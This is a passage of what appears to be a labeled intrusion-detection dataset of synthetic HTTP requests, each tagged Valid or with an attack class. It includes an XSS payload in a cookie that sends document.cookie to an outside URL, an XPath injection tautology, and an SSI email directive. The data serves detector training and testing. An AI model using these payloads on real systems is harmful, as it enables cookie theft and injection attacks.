GET /n5teu/ejWY3PsGbminH/dnhrpxwkn3/nU7U/theagDr/aM8/erBlikezqXDe/92HDD44kmetaL1VAjT/GpfSWWBC5LPZa/TQ_.html?dngtIe=w%2666&DaPP6=nwel+%3Deeo+orlrnie&tieat5odttahui=tXS&aeeI=e%7E&_aBBg.O1=sa%3Bh7azT%3Ab&gikjt7Rvttdto=5&6an=1&o6s=u552bsreyve6ns74A9&7oagoiP8mtsNt=0&ClJkCnM_m9=sgeh&daerTt=rNseru5tnawn&jadEh8eawmue=283268510 HTTP/1.1
Host: 246.128.41.25
Connection: keep-alive
Accept: application/*;q=0.0, application/x-tar;q=0.3, audio/*
Accept-Charset: big5;q=0.7, gb2312;q=0.9
Accept-Encoding: *;q=0.3
Accept-Language: sxNc-Efmbenn;q=0.7, aArile-asosnEe, o-phrp;q=0.9
Cache-Control: only-if-cached
Client-ip: 50.4.66.81
Cookie: 7vZrTiaaeac=as3km;a5iuu6CWnflRtn=360942
Cookie2: $Version="5"
Date: Fri, 02 Mar 07 19:02:48 CET
ETag: "oKxKJqZqUr8EJj6KE"
Expect: 100-continue
From: aclt@ntyaoohns.cz
If-Modified-Since: Sat, 03 Sep 05 13:37:28 UTC
If-Unmodified-Since: Sun, 05 Jul 09 10:47:53 CET
If-Match: *
If-None-Match: "H57c2nQtuwup@WJtwy"
If-Range: "sUb-tYVH8G@AphhM"
Max-Forwards: 5073
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: aseiIS htdyI=sragn
Authorization: NTLM R2VsbmFldWh0ZXluc203bnlpaXJjdnNubHR0dEhobVNz
Range: -14621,-370256
Referer: http://www.3gjl9hao.fr/nemnhr/ipro7hop/9ssuu/rufsa.tar.gz
TE: trailers,trailers,chunked
Trailer: If-None-Match
User-Agent: siweu/5.7.7.8
UA-CPU: Sparc
UA-Disp: 666,785,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 4388x7796
Via: HTTP/1.7 85.170.188.62, FTP/4.1 21.139.83.146, 3.0 www.6htn.html
Transfer-Encoding: gzip
Upgrade: hrdi/7.3, pbnr/9.0, Etitb/6.6, cut/3.8
Warning: 133 www.lJae.css "ewiowestteogamnuhux" "Sat, 06 Oct 07 10:45:03 CET"
X-Forwarded-For: 122.177.179.211
X-Serial-Number: 149066712456
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27933
Start - Id: 9697
class: Valid
GET /1mmailTQexecbz5selectI/ksdzinyke/aethoaq.gif?Wbt4n7=5538617&xWLnVQsa=oe3&1VLxLcmdZL=tt&en2Neouo=1%5Dfsosoo5dder&mXXZand=6c%40 HTTP/1.1
Host: www.Erobu.st:80
Connection: keep-alive
Accept: audio/x-wav, text/*
Accept-Charset: big5, iso-8859-4, x-mac-cyrillic, x-mac-chinesesimp, gb2312
Accept-Encoding: *;q=0.1
Accept-Language: dosi-qe1eIb, gofh-ecioretf;q=0.7, epnndrsr-eeenc, T8-emhstwra;q=0.0
Cache-Control: max-stale=3
Client-ip: 15.227.93.170
Cookie: Ynccrciwdc=30289;eto=a.7
Cookie2: $Version="8"
Date: Wed, 15 Feb 06 13:22:46 UTC
ETag: "6pz__4eCgpy@_zP2KI"
Expect: a6ne2bi=lomue
From: en20goGn@tsita.biz
If-Modified-Since: Mon, 07 May 07 02:01:36 GMT
If-Unmodified-Since: Wed, 02 Mar 05 11:06:24 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 04 Aug 08 23:56:55 CET
Max-Forwards: 7
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: NTLM YXJ1cE93b01vaVRhYVNhNGI5bnBhY250SHdiZ3JsZ3BzdGdu
Authorization: Basic N2tuc2RjdWI6b3NpeE4=
Range: -75689,8442-
Referer: http://www.9zflo.com/r07es/gcoa/foiGer/lbmez.js
TE: trailers,deflate
Trailer: Accept
User-Agent: avRHamg42h (n04wrbJ; sn_O7T@DpK)
UA-CPU: x86
UA-Disp: 229,8929,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9609x7925
Via: FTP/9.7 www.o9f5.html, 7.8 238.253.44.29, 0.3 www.iaeoti.png
Transfer-Encoding: dratn
Upgrade: td7l/3.2, eIl/8.1, toa/8.7
Warning: 862 88.8.119.32:92250 "son3z6laioi" 
X-Forwarded-For: 186.223.84.207
X-Serial-Number: 66630290652
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9697
Start - Id: 22670
class: Valid
GET /dQk@r-LmWb7uU/0aqnph-uTwp-ZdB/eprlytrtsOro1ipI/KyeX/5CwheredMincludermFg0B/ctshlzysaoes.jpeg?rTNWB=Peebeelmm&2g=7zmao HTTP/1.1
Host: 34.131.160.235
Connection: close
Accept: audio/*, text/plain
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 225.173.54.165
Cookie: eionu6n=7roel];rinoiTwqDq=brm;fbYU1Cboot.inix6gJ6=plinknpr
Cookie2: $Version="67"
Date: Sun, 11 Apr 04 20:27:58 GMT
ETag: "jnQdKGMrAZBmOLKG0"
Expect: 100-continue
From: ohhR@ti5t.uk
If-Modified-Since: Wed, 13 Aug 08 13:17:24 CET
If-Unmodified-Since: Wed, 15 Aug 07 02:31:02 GMT
If-Match: "l6SqHe1jctDHgh4"
If-None-Match: "UDmmJBB5CdC_2.p"
If-Range: *
Max-Forwards: 49
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: go0M6u fnxd=4kel
Authorization: Digest cnonce="4naw"
Range: -955
Referer: http://leoe3gcE.com/tohfth.asmx
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/5.1 (Windows; U; Win 9x 8.7; oi-e7; rv:5.5.6) Gecko/03302292
UA-CPU: Sparc
UA-Disp: 1998,0662,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0084x738
Via: FTP/1.0 23.27.6.150, HTTP/6.2 242.196.49.233, 9.4 242.115.172.169:3196
Transfer-Encoding: compress
Upgrade: Ttn/9.0, tP0eRt/0.6, u4tias/8.0, alon/7.6, m9oa5l/9.7
Warning: 139 www.hnsi.shtml "stteZiesi" 
X-Forwarded-For: 118.32.112.86
X-Serial-Number: 12701556330524195
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22670
Start - Id: 33179
class: Valid
PUT /7oFZCu0agroup byphpQDS_xP/kM2WlVk/t1DQi@Tbe0@6/Z.ErydJ4dlboot.initOPe.asmx? HTTP/1.0
Content-Length: 175
Content-Language: rmtom,mntte,e0io2ume
Content-Encoding: compress
Content-Location: /at4r9o.nsf
Content-MD5: c2RTN2ZqTnRRaXk4ZXRuNg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 Apr 08 07:06:53 UTC
Last-Modified: Fri, 02 Jun 06 01:59:28 GMT
Host: 14.55.196.221
Connection: close
Accept: audio/x-wav;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: of-ego, eohdxeoq-ErhJet
Cache-Control: no-store
Client-ip: 137.134.144.92
Cookie: i3ttn6hoexn=Sf3e;osjilKegOhdb=reeztcEae6rR1ls;lpuh2CchnN=oZo9nls4rl5uo4:;8ph=ata;lsda=xbtiNl1
Cookie2: $Version="07"
Date: Fri, 04 Aug 06 05:02:46 GMT
ETag: "1Vmi136-cCpNnqC0K"
Expect: 100-continue
From: bowRwos@eCtnuhy9r.cz
If-Modified-Since: Wed, 04 Jan 06 17:26:44 UTC
If-Unmodified-Since: Fri, 24 Feb 06 06:39:21 UTC
If-Match: "cHuRnIGTb8s6z9h5F30"
If-None-Match: *
If-Range: Sat, 09 Aug 08 16:30:37 GMT
Max-Forwards: 4272
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic Z0Vkbm9laTpycXhtdA==
Authorization: Digest realm
Range: 68833-,-57354
Referer: /ggeecYn.pdf
TE: chunked;q=0.1,gzip;q=0.4
Trailer: Accept-Encoding
User-Agent: 10tioenbrg0oad
UA-CPU: PowerPC
UA-Disp: 3344,7896,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 168x064
Via: 4.9 187.80.148.35
Transfer-Encoding: psog
Upgrade: afteyP/8.9, csc/8.1, exortn/7.3, erha/8.6, aschS/4.3
Warning: 008 6.86.95.176 "mrie" 
X-Forwarded-For: 121.78.223.99
X-Serial-Number: 0421946796861302632
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

subetxgacEnt=dauto&fiitrytadeesiJn=7JG&ET2=994782&ew9tt5aEea=)tf&m1nctohYthtoo1=ysioaBhdmtdmlmi&dTex=86epnQ4ana&Tq-@-V=09205&I_TZz04BM=eet&sltfoseraidh1er=30&tqrte16hidht=09

End - Id: 33179
Start - Id: 15005
class: Valid
GET /rnalIebaor/xterms/Uatzeljayoixbsuslmfo/yO45TyGps.cgi?Elt=163517 HTTP/1.1
Host: 239.198.95.131
Connection: Wejtesnl
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: jdyeOe7-xhh, rni-Si, cr4ecGut-mso;q=0.9
Cache-Control: min-fresh=9105
Client-ip: 167.67.44.2
Cookie: aqr=/n >e]et|oe'bgsound|Te;a4hodx5ta=653;rtredpN8=90019;oanoMtt=8981
Cookie2: $Version="375"
Date: Mon, 24 Dec 07 23:49:33 GMT
ETag: "e-U_E7xyEN4foaXU"
Expect: wsWt
From: ol9n@oiatmee.uk
If-Modified-Since: Sun, 20 May 07 17:10:04 GMT
If-Unmodified-Since: Tue, 19 Aug 08 14:20:00 GMT
If-Match: *
If-None-Match: "8QEXNxX3k2CxG_S8NMs"
If-Range: Tue, 11 Oct 05 01:56:50 CET
Max-Forwards: 32
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM YWVvZXNFYTVub1J1aXRTcHNscmUwZW5lcmVjaWJsY2Rvc2J1
Authorization: Digest opaque="otwtnt"
Range: 437989-,49-308,-959613
Referer: /imle.mspx
TE: trailers,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.6 (compatible; Konqueror/2.4; Open BSD i586; leircveti)
UA-CPU: StrongARM
UA-Disp: 0183,0676,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7618x6392
Via: FTP/9.0 142.235.124.178
Transfer-Encoding: isdri; te6n=qdwmt
Upgrade: qorD5j/0.6
Warning: 761 www.wes4plo.htm "uegyrlen951wsrr" 
X-Forwarded-For: 86.218.51.227
X-Serial-Number: 958943826904140
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15005
Start - Id: 48266
class: XSS
PUT /a3suk0RXx9hUGokh6/5PUJ/rpMrajls.jpg? HTTP/1.0
Content-Length: 176
Content-Language: sAcema,ssx
Content-Encoding: compress
Content-Location: /fgUg/rrwl/zD4o/eSzu/AeR6meSs.jpg
Content-MD5: dWU5YW90ZGw1aW1hMXJhMw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 13 Sep 09 13:06:16 CET
Last-Modified: Mon, 09 Jun 08 20:22:24 CET
Host: 120.46.186.45:11797
Connection: close
Accept: video/*, audio/basic;q=0.3, application/*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: am-r38g, aroo0-tnuo
Cache-Control: only-if-cached
Client-ip: 166.142.44.213
Cookie: nIdGT_P=0646;riealavnwn=vl;neceM=<div  style= "   width:  expression([document.location.replace  ('http://www.ie.com/cgi-bin/ic.cgi'+document.cookie);]); "   >;KC9Y8KXJp=pluyeunSocroiaedew;3ztWmacsttNt=nn samR &gm m;rwWRDanon=97
Cookie2: $Version="7"
Date: Thu, 20 Nov 08 07:55:53 CET
ETag: "1tnAy2knho3@h3Bu"
Expect: iotan
From: aeebosbw@2l6nl.biz
If-Modified-Since: Sun, 20 Nov 05 17:38:50 CET
If-Unmodified-Since: Fri, 16 Jan 04 06:42:53 UTC
If-Match: *
If-None-Match: "Fr5vHC@c6rYPassMOika"
If-Range: Tue, 11 Jan 05 06:15:42 GMT
Max-Forwards: 45
MIME-Version: 9.1
Pragma: lGt='druei'
Proxy-Authorization: Basic aGV5NXNpOnNLb28=
Authorization: Digest cnonce="ecral"
Range: 431947-
Referer: /h01qta/i3yl/elm1ma/soner0.sh
TE: chunked;q=0.8,chunked;q=0.2
Trailer: If-Match
User-Agent: Mozilla/5.9 (Windows; U; WinNT 5.6; er-ep; rv:7.5.0) Gecko/01490787
UA-CPU: Sparc
UA-Color: color8
UA-Pixels: 9755x524
Via: 9.1 0.46.134.210, 7.2 www.crt3.html:761, pip/1.0 252.11.15.104:941
Transfer-Encoding: setd
Upgrade: hmedu/0.7, dghhex/5.6, nnee/7.2, huoxb/6.1
Warning: 206 www.1psi7dr.css "kroeMrnpwdctalj" 
X-Serial-Number: 96907185083
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

kaNddnwoemco=ninsertad&qouuoydereide=toen psi&q0huaeeiodbcnuh=3&it0tdusdr=esfohtnq&ehh=4007561&ighi=3trcptaietfRfromas&ee12nbhas=:uiiLHeeengen:&xixt0koooobsvTE=o4nWV4FXBSlB

End - Id: 48266
Start - Id: 2628
class: Valid
GET /lQkbU98c/47xtIY8zm4rW-/Seein/aregmnodseshnassk/smAfmuctenle91IuLii/5erhleLbXisaO/m3/r2C/ttY@i88i2RzYJmRl.jpg?drdne0a0enng=n4aeg&es4lgnOtoy=rqf&n5l9NeretIOpte8=t&goa8aRLocjHiq=hmA&flm4hm4r0ma=tmpdUr&ietaatfibrd8=ae0ede%27v HTTP/1.1
Host: 127.17.35.226
Connection: amvc3u
Accept: audio/*
Accept-Charset: cp-936
Accept-Encoding: *
Accept-Language: loke-sE;q=0.2, rvehqt1-tEfo;q=0.1
Cache-Control: no-store
Client-ip: 20.154.59.202
Cookie: qle3bshaapoCr8o=50686799;1mhrw=Sdddsa
Cookie2: $Version="224"
Date: Wed, 26 Oct 05 10:59:58 CET
ETag: "Q-eSxUs2supfHmruUeEP"
Expect: aotsx
From: hcqlau@ypyesaoel.fr
If-Modified-Since: Sun, 31 Oct 04 17:54:05 CET
If-Unmodified-Since: Sun, 16 May 04 13:23:30 CET
If-Match: "gc-AbOTenjhKy@LIKLn"
If-None-Match: *
If-Range: *
Max-Forwards: 637
MIME-Version: 5.0
Pragma: ea=aii3rh
Proxy-Authorization: Digest uri=http://www.noelxt.uk/uceliu/partes/cnIjab.mdb
Authorization: Basic aW5yYXJzSmw6c2J5dWFyZA==
Range: -62003,-738
Referer: http://pfErlnv.st/ecuja/9ryoUa/cet7.htm
TE: trailers,gzip;q=0.2
Trailer: Pragma
User-Agent: Mozilla/2.1 (compatible; nfmusednr9; WinNT; fiontYX; rioa4o)
UA-CPU: 68000
UA-Disp: 409,1827,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 907x1790
Via: FTP/4.3 130.65.198.51:00, gCe/5.2 www.giHdma.js, 5.4 91.184.137.25
Transfer-Encoding: compress
Upgrade: byS/1.8, RdEme/2.6, m61N/2.9, doa2/8.0, ntsehr/4.6
Warning: 388 www.Fet6pwu.shtml "nteouIii" 
X-Forwarded-For: 17.4.174.85
X-Serial-Number: 93836
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2628
Start - Id: 29577
class: Valid
GET /mc9var_UrIEZF10/9h/wO/oyV6CQB-DY/a1atZ7Wrz5jYxNl4PUp/objectkwJUntD/nht.mspx?ieihlunhiez2i=dctmulctots4hXtT&65ZzGA=ioih&Intotix=%7Enn1ro&_UconnectNAphpV=n+s&eld7sn=o9reee4wqf&EgXzUX7o=179609980&y2osc=t1XhYlIEk&yNJhaoT=c%40Dh13&alhrmiEt=oC+o HTTP/1.1
Host: 227.188.120.243
Connection: keep-alive
Accept: image/*, video/*;q=0.5, text/xml;q=0.4
Accept-Charset: iso-8859-3
Accept-Encoding: identity;q=0.9
Accept-Language: tre1y-pgi;q=0.6, seaimRee-lhdru3ut;q=0.9, s2e5-sbnalne, qo-zTuqelt;q=0.0, norEu2-suaC
Cache-Control: no-cache
Client-ip: 241.190.126.224
Cookie: e5csmtd7Ds2=15333420;dtLos=r jl;erNnnbeEtte=aPmlv9;dwhhta=iTeiisqun
Cookie2: $Version="24"
Date: Mon, 23 Feb 04 12:31:16 CET
ETag: "1WYlWphnw6vMC-PjkoZ"
Expect: 100-continue
From: d1em@0njeio.be
If-Modified-Since: Wed, 14 Feb 07 05:09:42 GMT
If-Unmodified-Since: Wed, 16 Feb 05 20:49:29 CET
If-Match: *
If-None-Match: "eAw1NHLVwU9v-udysPtc"
If-Range: Sat, 19 Mar 05 03:23:54 CET
Max-Forwards: 93
MIME-Version: 6.8
Pragma: itial=o
Proxy-Authorization: NTLM OEExbjJIdHVzcjlzNDhlbHVwbWpjd3A4OXRwRTlkaXI=
Authorization: c1toak Canboa=bESmil
Range: 825369-97,558284-7,646196-4450
Referer: /easiol/yip2/cleeei/gyt0e/icyem.swf
TE: trailers,chunked,chunked;q=0.6
Trailer: Trailer
User-Agent: i4eahnslg/6.3
UA-CPU: 68000
UA-Disp: 872,513,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 3909x9569
Via: 1.4 239.222.110.49
Transfer-Encoding: deflate
Upgrade: 36yuhe/7.5, orrXnN/3.1, piil/2.2, er2iuu/0.7
Warning: 104 www.hlxEi9.htm:081 "oayabextiat9eH" "Mon, 21 Jan 08 17:09:27 CET"
X-Forwarded-For: 41.83.226.161
X-Serial-Number: 755614
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29577
Start - Id: 49617
class: XPathInjection
GET /tnr2xysdloAsNbhehos/u0d-OMx/cmdlkjxA1n/glnccneaceraysdha/eTdIyRTc.xhOgFPu2/naqsas0it6beih/tJ.php?grgcrnan=a2h&cdt=3HbcAW&3nythiegpPE=C%2Ft%2Fe5me7%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D6%5D+++++or++%27tedtt2s%27%3D+++%27&rmezlrxnrSeik=0450&hlcl=7856&TetcaRpV=e%2BseamilikeeaxC2s5&hesrt1Hqci=i4xGEDpu HTTP/1.1
Host: 75.159.109.223
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.0
Accept-Language: mec-mzy;q=0.9, enlie9-agnFeD
Cache-Control: no-store
Client-ip: 124.225.114.247
Cookie: yes=haincludedas;yttmiit=28133446;EnnfeS=dehAhym44si
Cookie2: $Version="39"
Date: Mon, 29 Oct 07 06:46:37 GMT
ETag: "eVeaeENvaQpVcAQ9"
Expect: 100-continue
From: rrm2hTst@reeb.net
If-Modified-Since: Sat, 04 Nov 06 06:14:56 UTC
If-Unmodified-Since: Fri, 30 Mar 07 04:00:39 UTC
If-Match: "i8mZcFmMw@B2PFY-oU"
If-None-Match: "yodA8mL6zKs.g1m0lKK0"
If-Range: "9E2RCRc4yeL3usjC-bn"
Max-Forwards: 24
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: NTLM bGN0bmlwc25pbjdicmlkNW10ekFjZXRuYWxhdWVpZWVo
Authorization: Digest opaque="Eatynuir"
Range: -098
Referer: /liseee/z1Dhan/e5Metesa.nsf
TE: deflate;q=0.4
Trailer: Accept-Charset
User-Agent: 1oo4Deu
UA-CPU: Sparc
UA-Disp: 8099,582,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: 3.2 www.oeLHt.jpg, HTTP/1.5 www.bneoEa.shtml
Transfer-Encoding: otngq
Upgrade: vhimw/6.7, 66r/2.5, 07c/5.1, wa94/8.2
Warning: 141 6.229.143.172 "7AsdeyisiebLeerrt" "Thu, 07 Aug 08 05:12:44 GMT"
X-Forwarded-For: 136.223.224.191
X-Serial-Number: 9696710
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49617
Start - Id: 2633
class: Valid
GET /n8MFMl2/p8r70wRYxTY/sem/atienlt8eUcgM/dI-LUYXj38MdhF/hsHpaTofb/Chtoj/tb4FvV/1Xy8ezw.swf?BLR8NB7NFD3b=85&9dQEotopen=h+icienat&48ma=38&5gFqyG8Ov=isme&nsauehdM=lE93Df7 HTTP/1.0
Host: 151.82.217.174
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: max-stale=4
Client-ip: 151.149.106.160
Cookie: tesei7o4rwn=44252041;ruo=2o as5afa7Tl;ianosO=6143;tgn=7610;maqiiior=rLimgropt%rtmailekhdmA9position;nsaoEIs=76010
Cookie2: $Version="224"
Date: Sat, 08 May 04 11:55:22 CET
ETag: "Q-eSxUs2supfHmruUeEP"
Expect: eete=ebyt;egeE
From: hcqlau@ypyesaoel.fr
If-Modified-Since: Sun, 31 Oct 04 17:54:05 CET
If-Unmodified-Since: Sun, 22 Nov 09 24:07:20 CET
If-Match: "7EXLXkdRCAmF_nQXB5_G"
If-None-Match: "7XdiUUl53MhH6-Stx"
If-Range: *
Max-Forwards: 019
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.noelxt.uk/uceliu/partes/cnIjab.mdb
Authorization: Basic OGpjbmNOYzpnNmVudXJyTA==
Range: 720674-61516,-25,7612-
Referer: http://q2ess.uk/hzq1O8/Nhtr.html
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/7.5 (compatible; Konqueror/9.5; Open BSD i586; ctttaeOsl)
UA-CPU: 68000
UA-Disp: 409,1827,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 907x1790
Via: 4.7 www.ereou.tiff
Transfer-Encoding: gzip
Upgrade: h6e/5.7, r19etr/1.8, 9U1qh/9.8
Warning: 388 www.Fet6pwu.shtml "nteouIii" 
X-Forwarded-For: 231.234.57.54
X-Serial-Number: 93836
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2633
Start - Id: 39306
class: SSI
GET /phpfp-NHIJYWmail/uMLYIiFdLDyDGB0@LV2z/pvse4dZh6ltyn/9i5Rzayceeosh/rcp@LkGM_6zbnnC/oese9hdtsseetN3S.asp?3Rph=htxml&rlrnOaEO7tp=ndmalinlc&o4oa=5+8w%3Fusae%40%3AttT2ghSft&mochametaLCDS5WG=fO58vbscript&erYkuio=+rmp&y6e5=%2B9from&tPkaswonoNl=%3C%21--%23email+fromhost%3D%22www.ttlaooc.com%22+tohost%3D%22mailbox.onore.com%22+message%3D%22potN+ihrvsi+esaLsan+0ann%22+fromaddress%3D%22dfoa.com%22+toaddress%3D%22erbo.e5e.com%22+subject%3D%22so%22+sender%3D%22oy.com%22+replyto%3D%22oemOxoH.com%22+cc%3D%22fi%22+inreplyto%3D%22obn+lpjr+dapo%22+id%3D%22wbxdymail%22+--%3E&syhzm0d=62&tiuns=w-EfHBbV&3aacss7e0e=7398&fWoIca5eerexmt=ieilglz_&r2s5mad1o5zxo=betweenrgroup+byjJtIlsnas2&sesvssTniuu=51&rsumzpgbq=prternbecy5e8k HTTP/1.0
Host: 80.164.102.210:218
Connection: close
Accept: */*;q=0.2
Accept-Charset: windows-1250, x-mac-icelandic;q=0.0, windows-1250;q=0.2
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 179.91.166.107
Cookie: OLGdeleted=essvntn;OvCVFPTXexecin=ocscript-v;ehs=ttl
Cookie2: $Version="7"
Date: Mon, 25 Jun 07 06:31:02 CET
ETag: W/"DlcQeChLuP4m93W"
Expect: oeyvtn
From: sflAsosn@djcmouei.de
If-Modified-Since: Tue, 28 Jun 05 05:13:25 GMT
If-Unmodified-Since: Sun, 21 May 06 07:03:51 GMT
If-Match: "eLIV9cThnKi3OganoQj"
If-None-Match: "0HKt4KJnb7on6yK6hWby"
If-Range: *
Max-Forwards: 4
MIME-Version: 8.9
Pragma: trstii8=ftpothnq
Proxy-Authorization: Basic bDN0bGhzOmVldEdkZXI=
Authorization: NTLM clNvU2VQc2hzcHFpZWMyaWxvdGVmcnN0YWhlb3R2d29pc3JqZWFp
Range: -7615,124-
Referer: http://www.emainao.de/sAemdsx0/pEor/5rao/1ealtaOr.fgf
TE: trailers,deflate;q=0.6
Trailer: Accept-Charset
User-Agent: Mozilla/3.3 (Windows; U; Windows NT 8.2; Se-ef; rv:1.4.8) Gecko/50252395
UA-CPU: MIPS
UA-Disp: 646,7509,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 5234x268
Via: unmc/1.0 59.169.11.105, 4.0 235.210.94.78
Transfer-Encoding: deflate
Upgrade: bFbb/5.5
Warning: 228 www.sonottir.jpg "rhCetiasi8AntEe7B" "Tue, 08 May 07 07:56:15 GMT"
X-Forwarded-For: 229.251.127.187
X-Serial-Number: 559061405127813998
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39306
Start - Id: 34883
class: Valid
POST /azaP4z6aBdwRQ/5-xZphCT8-sa0wsXoY/e@KGuqsn-vi.asp? HTTP/1.0
Content-Length: 281
Content-Language: adlli,1o6hh,itf
Content-Encoding: identity
Content-Location: http://ua6og3.cz/wpqisshc/phewnl/heyc.mdb
Content-MD5: aGlsZ2k5OTZjc25sbGVvZA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 13 Mar 06 19:52:30 GMT
Last-Modified: Mon, 05 Mar 07 02:27:22 UTC
Host: 151.79.179.53
Connection: close
Accept: image/*;q=0.2, image/gif, image/*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: e-e;q=0.8
Cache-Control: no-cache
Client-ip: 148.13.5.11
Cookie: Ourvo7=jaeemo7Ztae9o;nni5ss0euqeoa=8532184
Cookie2: $Version="1"
Date: Thu, 02 Feb 06 09:30:56 CET
ETag: W/"7ySw84e5YYz1yTHEI"
Expect: 100-continue
From: aioNe@o85EoEesvN.org
If-Modified-Since: Tue, 28 Jun 05 13:32:02 GMT
If-Unmodified-Since: Sun, 12 Feb 06 01:24:51 GMT
If-Match: "iQlgC@CGZahLT8Os_r"
If-None-Match: "Zj@Hh34l@Us3uhyvGUrU"
If-Range: *
Max-Forwards: 0166
MIME-Version: 8.7
Pragma: etclzii='oHhai'
Proxy-Authorization: NTLM U21lZDd1WG1kclRVdGx6cWNwbW82czhhbmk0bXR5bmllYXRvbHNxbnRhbDRlZQ==
Authorization: Digest nc=48a2c5eE
Range: 092889-
Referer: /Jot6i/itfiTqn/emt6asn.exe
TE: deflate;q=0.6,trailers
Trailer: Trailer
User-Agent: asgIaa (iMZKEF8fh; hnwMI@pj; d2JEsOk; eCW.Zqm_; pVWjq3Wy)
UA-CPU: MIPS
UA-Disp: 6897,377,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 084x478
Via: 2.7 116.239.130.14, 4.4 www.talk.png, FTP/9.5 50.149.54.212
Transfer-Encoding: cepoo
Upgrade: minhlz/2.0, gtr/0.2, nusiot/8.5
Warning: 197 www.aRtfe.js "nixbwit" "Wed, 24 Sep 08 09:37:18 CET"
X-Forwarded-For: 186.251.191.52
X-Serial-Number: 2485282354068537575
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

F0GyeA=nt5pa7&cjL1=utui$rmdStvhwindow.opentsbei&oceeTi0oalNv=ecY47v&tnl4wria=jz2mvzPsirntd&bnqEne=86&oYtt=Efxrt0fneynRn&pc=4259487&dotlhneREonn=raguhsarhtrQe&FMHXoadmin.EKu=iinrgaNhavingo0rtftpe&ryeDtopenVI9idaa=595529&furm=ayaphavingEye&dtmruE8co5gh=tkKnvxJ0W2m&VvNIe=piframetZt

End - Id: 34883
Start - Id: 19872
class: Valid
GET /uHFAs1HBbp/iTjnFeoptjRhttpKIlog@/hweefo5nwtieeizA3vr/alnai/aH6heawlutthidtl6t/aJF7/dNd-0.M_eiaQ710cbY/tu2nytttsjsrtabE/srsjlsb1gdodrvamS/rtemaa/-@M4ibxmlD/onsyBuiha.jpeg?bgzoazqi=etNchitt&nere=8s%3Cegr2i&nh0tasetvopst=5740412&CNG2Iz=update&Arey3iosdrmd=si&1aGtNFie9vn=rl&tu=+&8rL=tt7lseithcHe0S HTTP/1.1
Host: 249.55.231.247
Connection: aodm
Accept: application/*, audio/basic;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: iz-8Peixhso;q=0.3, 2ayho-i, 2-na;q=0.3, iebzcr-eyI, diN-cyhi
Cache-Control: no-store
Client-ip: 169.241.81.8
Cookie: i3tkyn6nehsenia=Nnmaile;teddsohaAfjnase=te1;mw;eenn3ouaTntvl=8198;tti=5705769
Cookie2: $Version="919"
Date: Mon, 22 Oct 07 17:28:32 GMT
ETag: "EOrffeq49PfEhy3d0pn"
Expect: 100-continue
From: ebMr@ot7cggaev.net
If-Modified-Since: Sun, 27 Jan 08 01:35:36 CET
If-Unmodified-Since: Mon, 05 Oct 09 18:17:48 GMT
If-Match: "HyHK6jA0tOAkKxmYzvHn"
If-None-Match: *
If-Range: *
Max-Forwards: 4374
MIME-Version: 6.7
Pragma: tgTmmiat='p1i'
Proxy-Authorization: tIsore haesemqr=7tm5
Authorization: tea1o nhanj=jrinhc
Range: 752-,475-082626,-6481
